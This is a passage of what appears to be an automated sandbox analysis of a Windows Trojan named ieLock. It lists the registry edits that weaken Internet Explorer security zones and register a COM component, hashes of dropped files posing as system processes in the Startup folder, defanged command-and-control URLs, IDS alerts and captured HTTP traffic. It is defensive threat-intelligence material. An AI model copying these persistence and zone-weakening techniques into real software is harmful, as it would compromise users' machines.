[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"ope15.bat" = "ope15"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%\Helps]
"ieLock.exe" = "ieLock"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process regsvr32.exe:3836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A BF 0A EB D6 1F 62 CD 34 8D 40 1D F8 9F C1 11"

[HKCR\CLSID\{2BA1194C-8219-4C38-93DA-2E57F1308DBD}\VERSION]
"(Default)" = "2.0"

[HKCR\CLSID\{2BA1194C-8219-4C38-93DA-2E57F1308DBD}\InprocServer32]
"(Default)" = "%WinDir%\Helps\ieLock.dll"

[HKCR\TypeLib\{937BD1EA-BDEB-4720-B8BE-A0D54EE71FD9}\2.0]
"(Default)" = "ieLock"

[HKCR\Interface\{82C7B3E8-D8EB-456F-A6E4-1DDFBBCDC6EE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{937BD1EA-BDEB-4720-B8BE-A0D54EE71FD9}\2.0\HELPDIR]
"(Default)" = "%WinDir%\Helps"

[HKCR\Interface\{82C7B3E8-D8EB-456F-A6E4-1DDFBBCDC6EE}]
"(Default)" = "_Class1"

[HKCR\CLSID\{2BA1194C-8219-4C38-93DA-2E57F1308DBD}\ProgID]
"(Default)" = "ieLock.Class1"

[HKCR\CLSID\{2BA1194C-8219-4C38-93DA-2E57F1308DBD}\TypeLib]
"(Default)" = "{937BD1EA-BDEB-4720-B8BE-A0D54EE71FD9}"

[HKCR\TypeLib\{937BD1EA-BDEB-4720-B8BE-A0D54EE71FD9}\2.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{2BA1194C-8219-4C38-93DA-2E57F1308DBD}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\ieLock.Class1]
"(Default)" = "ieLock.Class1"

[HKCR\Interface\{82C7B3E8-D8EB-456F-A6E4-1DDFBBCDC6EE}\TypeLib]
"Version" = "2.0"

[HKCR\ieLock.Class1\Clsid]
"(Default)" = "{2BA1194C-8219-4C38-93DA-2E57F1308DBD}"

[HKCR\Interface\{82C7B3E8-D8EB-456F-A6E4-1DDFBBCDC6EE}\TypeLib]
"(Default)" = "{937BD1EA-BDEB-4720-B8BE-A0D54EE71FD9}"

[HKCR\CLSID\{2BA1194C-8219-4C38-93DA-2E57F1308DBD}]
"(Default)" = "ieLock.Class1"

[HKCR\Interface\{82C7B3E8-D8EB-456F-A6E4-1DDFBBCDC6EE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{937BD1EA-BDEB-4720-B8BE-A0D54EE71FD9}\2.0\0\win32]
"(Default)" = "%WinDir%\Helps\ieLock.dll"

The process serverc.exe:676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 84 A5 A5 95 7D 93 D2 B7 48 0E 9B A9 96 81 18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

Dropped PE files

MD5	File path
c380be9ac5ffda1d7d0f8ce3b089c0f3	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\alg.exe
55905e5c06318cf08bc05e589e303c78	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\explorer.exe
6e2df689bce54691c338658089947a23	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\lsass.exe
524a4fd6e226bb8853bc4749a05978d0	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\mstsc.exe
548fd7007430a3c4298d15a4f494ab3e	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\mstsv.exe
fb6da7701801b8ac6a58308babd553d7	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\services.exe
1d3e5e8db2e29478df42b295640d139d	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsc.exe
20d2f9507dff3cc967431558ebbe3412	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsv.exe
9566951ec6ff4ab7cb88d8e84acaa5e7	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\svchost.exe
8c03dfb96ec539b3877cd533afd6bb48	c:\Documents and Settings\All Users\Start Menu\Programs\Startup\winlogon.exe
a9e88f61429dd0063c0b6539f9f4c575	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\kisse.exe
96a78335eb1baa7f6492c2d90aacb8ed	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\misse.exe
267373d57e27873d69fcf4bba6bb2a16	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\serverc.exe
a9e88f61429dd0063c0b6539f9f4c575	c:\Program Files\QQNews\QQNews.exe
1428d09b77fa9f16c826b182e65f5b94	c:\WINDOWS\Helps\ieLock.dll
7254bfe382aa181233ab342d2f142e69	c:\WINDOWS\Helps\ieLock.exe
b03789a726a2e0d65fe581fb6afc4b17	c:\WINDOWS\system32\chrome.exe
d1daedfab248d69fbb4974484e87b51d	c:\WINDOWS\system32\lasrse.exe
4def926f6a0545ae486a03c84f2ee482	c:\WINDOWS\system32\rasman.tmp
4def926f6a0545ae486a03c84f2ee482	c:\WINDOWS\system32\rasmanOrg.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
SEC	4096	3608	1536	3.61929	67c2738f6bfd7e4171c40f79df2e9b28
.rsrc	8192	760545	760545	5.45452	bf68ea8f097ef9725f05b7ce72099268

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://1.rwdns.com/zztj/yeshe.html	103.24.95.182
hxxp://1.rwdns.com/GetData.asp	103.24.95.182
hxxp://1.rwdns.com/SetData.asp	103.24.95.182
hxxp://www.a.shifen.com/s?wd=å—äº¬åŽæ‰¬å¤ªé˜³èƒ½ç»´ä¿®
hxxp://124.248.254.82/web/click_log2.asp?ad_url=47556mqqu?*rrr+lq==0+fjh+fkr`gw`blfdvqZ470Z4+dvu&cr=yes
hxxp://www.a.shifen.com/
hxxp://yd.ecoma.glb0.lxdns.com/
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=4690803&web_id=4690803
hxxp://www.a.shifen.com/img/bd_logo1.png
hxxp://www.a.shifen.com/img/baidu_jgylogo3.gif
hxxp://1111.ip138.com/ic.asp	183.238.101.232
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/jquery/jquery-1.10.2.min_f2fb5194.js
hxxp://2c20bdadcc004a3d.cdn.fhldns.com/xc.txt
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/global/img/icons_b5457670.gif
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=4690803&t=z
hxxp://oz.cnzz.com/stat.htm?id=4690803&r=&lg=en-us&ntime=none&cnzz_eid=1728210536-1429193417-&showp=1916x902&t=&h=1&rnd=316818665	198.11.132.200
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/global/js/all_async_popstate1_0c1233e7.js
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/home/js/nu_instant_search_fb92f064.js
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/global/img/quickdelete_9c14b01a.png
hxxp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx	218.85.133.70
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/sug/js/bdsug_547e5a10.js
hxxp://www.a.shifen.com/favicon.ico
hxxp://passport.n.shifen.com/passApi/js/uni_login_wrapper.js?cdnversion=1429193425851&_=1429193425101
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/baiduia/baiduia_b45d552b.js
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/plugins/every_cookie_09fe94e0.js
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/baiduia/JSocket_9a52fc3e.swf?0.05
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/plugins/env_5202315f.swf
hxxp://suggestion.a.shifen.com/su?wd=&zxmode=1&json=1&p=3&sid=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498&cb=jQuery11020564010697925782_1429193425102&_=1429193425103
hxxp://124.248.254.82/web/reg/icast_125_1.asp
hxxp://suggestion.a.shifen.com/su?wd=Ã„&zxmode=1&json=1&p=3&sid=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498&cb=jQuery11020564010697925782_1429193425102&_=1429193425104
hxxp://base64.wshifen.com/img/pc.gif?_t=842
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=132663274	42.120.219.171
hxxp://t1.n.shifen.com/ps_default.gif?_t=1429193428632
hxxp://t1.n.shifen.com/ps_default.gif?_t=1429193428648
hxxp://t1.n.shifen.com/ps_default.gif?_t=1429193428663
hxxp://bcs.jomodns.com/public03/pc.gif?_t=1429193428632
hxxp://cnzz.mmstat.com/app.gif?&cna=0rC2DWbMLVwCASU5EL1qq92F	42.120.219.171
hxxp://n4cs.gccdn.net/a/20150405/40098172_1.shtml
hxxp://n4cs.gccdn.net/base/jQuery/jquery-1.9.1.min.js
hxxp://yd.ecoma.glb0.lxdns.com/ifeng/sources/inice_v1.js
hxxp://yd.ecoma.glb0.lxdns.com/ifeng/sources/region_v1.js
hxxp://region.ifeng.com/get?format=js&callback=setRegionCookies	211.151.175.10
hxxp://n4cs.gccdn.net/commonpage/1130/F-RequireJS.min.js
hxxp://n4cs.gccdn.net/314bd925cdd17196/2014/1203/pc.css
hxxp://n4cs.gccdn.net/a/2015/0311/fa.min.js
hxxp://n4cs.gccdn.net/commonpage/1210/comment.number.min.js
hxxp://n4cs.gccdn.net/commonpage/1129/v1/all.png
hxxp://pagead46.l.doubleclick.net/tag/js/gpt.js
hxxp://n4cs.gccdn.net/commonpage/0709/d_07.png
hxxp://n4cs.gccdn.net/e01ed39fc2da5d4a/2013/1205/health.gif
hxxp://yd.ecoma.glb0.lxdns.com/0f56ee67a4c375c2/2013/1106/indeccode.png
hxxp://n4cs.gccdn.net/commonpage/0304/arrow.gif
hxxp://n4cs.gccdn.net/cmpp/2014/12/24/07/1d2544d2-0a9e-4b12-87b8-30facc8dd482.jpg
hxxp://pagead46.l.doubleclick.net/tag/js/check_359604.js
hxxp://partnerad.l.doubleclick.net/gpt/pubads_impl_59.js
hxxp://pagead-googlehosted.l.google.com/safeframe/1-0-2/html/container.html
hxxp://n4cs.gccdn.net/e01ed39fc2da5d4a/2014/0317/sharebg.gif
hxxp://x.gslb.jdcache.com/exsites?spread_type=2&ad_ids=552:5&location_info=0&callback=getjjsku_callback
hxxp://n4cs.gccdn.net/base/origin/F-amd-1.2.0.min.js
hxxp://mapdx.icast.cn/hdt-cookie/ck?n=preViewCookie_35&v=bye&t=0
hxxp://mapdx.icast.cn/hdt-cookie/ck?n=force_preview&v=FT1504130011-4493-CT150407010&t=-1&turl=http://adm.icast.cn/nortb/hdt-ifocus/request/?id=PM1304281078&be_retarg=RE141201001
hxxp://admdx.icast.cn/nortb/hdt-ifocus/request/?id=PM1304281078&be_retarg=RE141201001
hxxp://www.a.shifen.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860
hxxp://t1.n.shifen.com/it/u=194142598,852924299&fm=58
hxxp://t1.n.shifen.com/it/u=3488912159,3986088090&fm=58
hxxp://t1.n.shifen.com/it/u=2394089844,1505224976&fm=58
hxxp://t1.n.shifen.com/it/u=3537516083,882981865&fm=58
hxxp://t1.n.shifen.com/it/u=3263161068,3203223156&fm=58
hxxp://t1.n.shifen.com/it/u=602776483,2047304585&fm=58
hxxp://wwwstatic1.wshifen.com/r/www/cache/static/global/js/call-bdbrowser_97c84903.js
hxxp://passport.n.shifen.com/passApi/js/uni_login_wrapper.js?cdnversion=1429193460319&_=1429193460101
hxxp://t1.n.shifen.com/it/u=1288538148,116491288&fm=58
hxxp://t1.n.shifen.com/it/u=4267047014,3229650163&fm=58
hxxp://s.a.shifen.com/w.gif?q=0‡20ˆ30†60„80†30„90ˆ50Š70ˆ00…00ˆ50‹00‡20‰50ˆ20…10ˆ40‰7&fm=se&T=1429193454&y=B776A7CF&rsv_cache=0&rsv_svoice=0&rsv_pre=0&rsv_reh=63_83_63_83_63_83_63_63_103_63\|304_387&rsv_scr=1895_1242_110_0_902_1916&rsv_psid=6483934B3F9915C4C4DEE385E7300A12&rsv_sid=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498&cid=0&qid=8ec273590001dc81&t=1429193461944&rsv_iorr=1&rsv_tn=baidu&rsv_ssl=0&path=http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=%C3%84%C3%8F%C2%BE%C2%A9%C2%BB%C2%AA%C3%91%C3%AF%C3%8C%C2%AB%C3%91%C3%B4%C3%84%C3%9C%C3%8E%C2%AC%C3%90%C3%9E&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V%2BD3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860
hxxp://static.n.shifen.com/v.gif?pid=201&pj=www&fm=behs&tab=baidu_browsershow&path=http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=%C3%84%C3%8F%C2%BE%C2%A9%C2%BB%C2%AA%C3%91%C3%AF%C3%8C%C2%AB%C3%91%C3%B4%C3%84%C3%9C%C3%8E%C2%AC%C3%90%C3%9E&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V%2BD3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860&wd=0‡20ˆ30†60„80†30„90ˆ50Š70ˆ00…00ˆ50‹00‡20‰50ˆ20…10ˆ40‰7&rsv_sid=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498&t=1429193461194
hxxp://www.a.shifen.com/cache/fpid/ielib_0108.js
hxxp://c.e.shifen.com/c.gif?t=0&q=0‡20ˆ30†60„80†30„90ˆ50Š70ˆ00…00ˆ50‹00‡20‰50ˆ20…10ˆ40‰7&p=0&pn=1
hxxp://www.a.shifen.com/cache/fpid/o_0108.swf
hxxp://s.a.shifen.com/w.gif?q=0‡20ˆ30†60„80†30„90ˆ50Š70ˆ00…00ˆ50‹00‡20‰50ˆ20…10ˆ40‰7&fm=inlo&rsv_psid_page=0&rsv_psid1=6483934B3F9915C4C4DEE385E7300A12&rsv_psid2=8C833062B6F97482CA56473B4B36B66F&rsv_psid_type=2&rsv_psid_dev=010&rsv_sid=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498&cid=0&qid=8ec273590001dc81&t=1429193465210&rsv_iorr=1&rsv_tn=baidu&rsv_ssl=0&path=http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=%C3%84%C3%8F%C2%BE%C2%A9%C2%BB%C2%AA%C3%91%C3%AF%C3%8C%C2%AB%C3%91%C3%B4%C3%84%C3%9C%C3%8E%C2%AC%C3%90%C3%9E&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V%2BD3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860
hxxp://s1.bdstatic.com/r/www/cache/static/home/js/nu_instant_search_fb92f064.js	185.10.107.168
hxxp://i9.baidu.com/ps_default.gif?_t=1429193428648	180.97.33.30
hxxp://y0.ifengimg.com/314bd925cdd17196/2014/1203/pc.css	37.29.0.93
hxxp://fashion.ifeng.com/a/20150405/40098172_1.shtml	37.29.0.105
hxxp://t12.baidu.com/it/u=4267047014,3229650163&fm=58	180.97.33.30
hxxp://s1.bdstatic.com/r/www/cache/static/global/img/quickdelete_9c14b01a.png	185.10.107.168
hxxp://y0.ifengimg.com/a/2015/0311/fa.min.js	37.29.0.93
hxxp://s1.bdstatic.com/r/www/cache/static/baiduia/JSocket_9a52fc3e.swf?0.05	185.10.107.168
hxxp://t10.baidu.com/it/u=1288538148,116491288&fm=58	180.97.33.30
hxxp://c.cnzz.com/core.php?web_id=4690803&t=z	195.27.31.248
hxxp://s1.bdstatic.com/r/www/cache/static/global/js/call-bdbrowser_97c84903.js	185.10.107.168
hxxp://y0.ifengimg.com/commonpage/1129/v1/all.png	37.29.0.93
hxxp://t12.baidu.com/it/u=3488912159,3986088090&fm=58	180.97.33.30
hxxp://s1.bdstatic.com/r/www/cache/static/global/img/icons_b5457670.gif	185.10.107.168
hxxp://s1.bdstatic.com/r/www/cache/static/plugins/env_5202315f.swf	185.10.107.168
hxxp://y2.ifengimg.com/e01ed39fc2da5d4a/2013/1205/health.gif	37.29.0.20
hxxp://i7.baidu.com/ps_default.gif?_t=1429193428632	180.97.33.30
hxxp://suggestion.baidu.com/su?wd=&zxmode=1&json=1&p=3&sid=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498&cb=jQuery11020564010697925782_1429193425102&_=1429193425103	123.125.114.101
hxxp://y0.ifengimg.com/base/origin/F-amd-1.2.0.min.js	37.29.0.93
hxxp://partner.googleadservices.com/gpt/pubads_impl_59.js	173.194.113.205
hxxp://map.icast.cn/hdt-cookie/ck?n=preViewCookie_35&v=bye&t=0	122.225.81.63
hxxp://y0.ifengimg.com/commonpage/1210/comment.number.min.js	37.29.0.93
hxxp://t10.baidu.com/it/u=3263161068,3203223156&fm=58	180.97.33.30
hxxp://adm.icast.cn/nortb/hdt-ifocus/request/?id=PM1304281078&be_retarg=RE141201001	122.225.81.41
hxxp://i8.baidu.com/ps_default.gif?_t=1429193428632	180.97.33.30
hxxp://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860	180.76.3.151
hxxp://www.baidu.com/	180.76.3.151
hxxp://t10.baidu.com/it/u=2394089844,1505224976&fm=58	180.97.33.30
hxxp://y2.ifengimg.com/e01ed39fc2da5d4a/2014/0317/sharebg.gif	37.29.0.20
hxxp://ecma.bdimg.com/public03/pc.gif?_t=1429193428632	180.97.66.39
hxxp://pcookie.cnzz.com/app.gif?&cna=0rC2DWbMLVwCASU5EL1qq92F	42.120.219.171
hxxp://www.baidu.com/cache/fpid/ielib_0108.js	180.76.3.151
hxxp://y0.ifengimg.com/commonpage/1130/F-RequireJS.min.js	37.29.0.93
hxxp://s1.bdstatic.com/r/www/cache/static/baiduia/baiduia_b45d552b.js	185.10.107.168
hxxp://t12.baidu.com/it/u=3537516083,882981865&fm=58	180.97.33.30
hxxp://www.baidu.com/s?wd=å—äº¬åŽæ‰¬å¤ªé˜³èƒ½ç»´ä¿®	180.76.3.151
hxxp://m1.ifengimg.com/ifeng/sources/inice_v1.js	203.130.61.92
hxxp://www.baidu.com/img/bd_logo1.png	180.76.3.151
hxxp://www.ip138.com/	203.130.61.92
hxxp://c.baidu.com/c.gif?t=0&q=0‡20ˆ30†60„80†30„90ˆ50Š70ˆ00…00ˆ50‹00‡20‰50ˆ20…10ˆ40‰7&p=0&pn=1	123.125.114.64
hxxp://passport.baidu.com/passApi/js/uni_login_wrapper.js?cdnversion=1429193460319&_=1429193460101	180.76.2.35
hxxp://www.baidu.com/favicon.ico	180.76.3.151
hxxp://www.it885.com.cn/web/click_log2.asp?ad_url=47556mqqu?*rrr+lq==0+fjh+fkr`gw`blfdvqZ470Z4+dvu&cr=yes
hxxp://www.googletagservices.com/tag/js/check_359604.js	216.58.209.194
hxxp://y1.ifengimg.com/commonpage/0709/d_07.png	37.29.0.79
hxxp://s1.bdstatic.com/r/www/cache/static/jquery/jquery-1.10.2.min_f2fb5194.js	185.10.107.168
hxxp://t11.baidu.com/ps_default.gif?_t=1429193428663	180.97.33.30
hxxp://www.googletagservices.com/tag/js/gpt.js	216.58.209.194
hxxp://h2.ifengimg.com/ifeng/sources/region_v1.js	203.130.61.92
hxxp://passport.baidu.com/passApi/js/uni_login_wrapper.js?cdnversion=1429193425851&_=1429193425101	180.76.2.35
hxxp://www.it885.com.cn/web/reg/icast_125_1.asp
hxxp://s1.bdstatic.com/r/www/cache/static/sug/js/bdsug_547e5a10.js	185.10.107.168
hxxp://t10.baidu.com/ps_default.gif?_t=1429193428648	180.97.33.30
hxxp://b1.bdstatic.com/img/pc.gif?_t=842	185.10.107.147
hxxp://t11.baidu.com/it/u=194142598,852924299&fm=58	180.97.33.30
hxxp://t12.baidu.com/ps_default.gif?_t=1429193428663	180.97.33.30
hxxp://s1.bdstatic.com/r/www/cache/static/plugins/every_cookie_09fe94e0.js	185.10.107.168
hxxp://y0.ifengimg.com/base/jQuery/jquery-1.9.1.min.js	37.29.0.93
hxxp://y0.ifengimg.com/commonpage/0304/arrow.gif	37.29.0.93
hxxp://h2.ifengimg.com/0f56ee67a4c375c2/2013/1106/indeccode.png	203.130.61.92
hxxp://www.baidu.com/img/baidu_jgylogo3.gif	180.76.3.151
hxxp://map.icast.cn/hdt-cookie/ck?n=force_preview&v=FT1504130011-4493-CT150407010&t=-1&turl=http://adm.icast.cn/nortb/hdt-ifocus/request/?id=PM1304281078&be_retarg=RE141201001	122.225.81.63
hxxp://t11.baidu.com/it/u=602776483,2047304585&fm=58	180.97.33.30
hxxp://wangbao.6299.cc/xc.txt	222.216.190.83
hxxp://s1.bdstatic.com/r/www/cache/static/global/js/all_async_popstate1_0c1233e7.js	185.10.107.168
hxxp://y3.ifengimg.com/cmpp/2014/12/24/07/1d2544d2-0a9e-4b12-87b8-30facc8dd482.jpg	37.29.0.41
hxxp://www.baidu.com/cache/fpid/o_0108.swf	180.76.3.151
hxxp://tpc.googlesyndication.com/safeframe/1-0-2/html/container.html	216.58.209.193
hxxp://s6.cnzz.com/stat.php?id=4690803&web_id=4690803	1.99.192.15
hxxp://suggestion.baidu.com/su?wd=Ã„&zxmode=1&json=1&p=3&sid=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498&cb=jQuery11020564010697925782_1429193425102&_=1429193425104	123.125.114.101
3544.myzmnet.com	122.224.18.16
formi.baidu.com	61.135.169.120
3599.myzmnet.com	222.186.32.156
3522.myzmnet.com	122.224.18.16
mfp.deliver.ifeng.com	223.202.39.26
3577.myzmnet.com	124.173.125.131
cnzz.9ycj.com	98.126.11.190
x.jd.com	58.83.212.161
3588.myzmnet.com	124.172.139.29
eclick.baidu.com	123.125.115.164
nsclick.baidu.com	115.239.211.92
3511.myzmnet.com	122.224.18.16
3555.myzmnet.com	122.224.18.16
3500.myzmnet.com	122.224.18.16
3566.myzmnet.com	122.224.18.16
myhm.mybmnet.com	122.224.18.16
sclick.baidu.com	123.125.115.95
3533.myzmnet.com	122.224.18.16

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Suspicious User-Agent (WindowsNT) With No Separating Space
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET TROJAN Generic Password Stealer User Agent Detected (RookIE)
ET MALWARE User-Agent (Mozilla/4.0 (compatible))
ET MALWARE User-Agent (Internet Explorer)
ET POLICY Outdated Windows Flash Version IE

Traffic

GET /ic.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible)

Host: 1111.ip138.com


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:14:18 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 217

Content-Type: text/html

Set-Cookie: ASPSESSIONIDAASDCCDB=JIIPFKLDJJNPNBPDFLIHJJKL; path=/

Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[37.57.16.189] ............</center></body></html&
gt;HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 14:14:18 GMT..Server: Micro
soft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 217..Content-Type
: text/html..Set-Cookie: ASPSESSIONIDAASDCCDB=JIIPFKLDJJNPNBPDFLIHJJKL
; path=/..Cache-control: private..<html>..<head>..<meta
 http-equiv="content-type" content="text/html; charset=gb2312">..&l
t;title> ....IP.... </title>..</head>..<body style="
margin:0px"><center>....IP....[37.57.16.189] ............<
/center></body></html>..

GET /hdt-cookie/ck?n=preViewCookie_35&v=bye&t=0 HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: map.icast.cn

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

P3P: CP=CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR

Set-Cookie: preViewCookie_35=bye; Domain=icast.cn; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Content-Length: 0

Date: Thu, 16 Apr 2015 14:10:39 GMT

Connection: close

GET /e01ed39fc2da5d4a/2013/1205/health.gif HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y2.ifengimg.com

Connection: Keep-Alive


